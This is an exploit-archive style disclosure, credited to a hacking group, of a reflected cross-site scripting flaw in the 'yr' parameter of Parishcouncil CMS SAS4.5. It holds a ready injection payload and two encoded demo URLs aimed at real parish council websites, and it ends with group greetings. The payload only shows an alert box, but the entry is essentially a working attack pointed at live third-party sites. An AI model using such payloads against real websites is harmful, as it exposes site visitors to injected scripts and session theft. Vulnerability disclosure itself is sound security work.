Parishcouncil CMS version SAS4.5 suffers from a cross site scripting vulnerability.
73a4a6a03029369ee94859f7830e8b0463b27d0e945fcd98ad7d9e55aa6261c1
######################
# Exploit Title : Parishcouncil CMS SAS4.5 / Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://www.parishcouncilwebsites.com/updating.php
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: SAS4.5
# Date: 2016/06/21
######################
#
# PoC:
# yr Get Parameter Vulnerable To XSS
# Payload : '><img onerror=alert(1) src="asd">
# Demo :
#http://www.barkham-parishcouncil.org.uk/content/cal_index.php?mo=7&yr=2016%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
#http://www.folksworthandwashingley-pc.org.uk/content/cal_index.php?mo=7&yr=2016%27%3E%3Cimg%20onerror=alert%281%29%20src=%22asd%22%3E
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################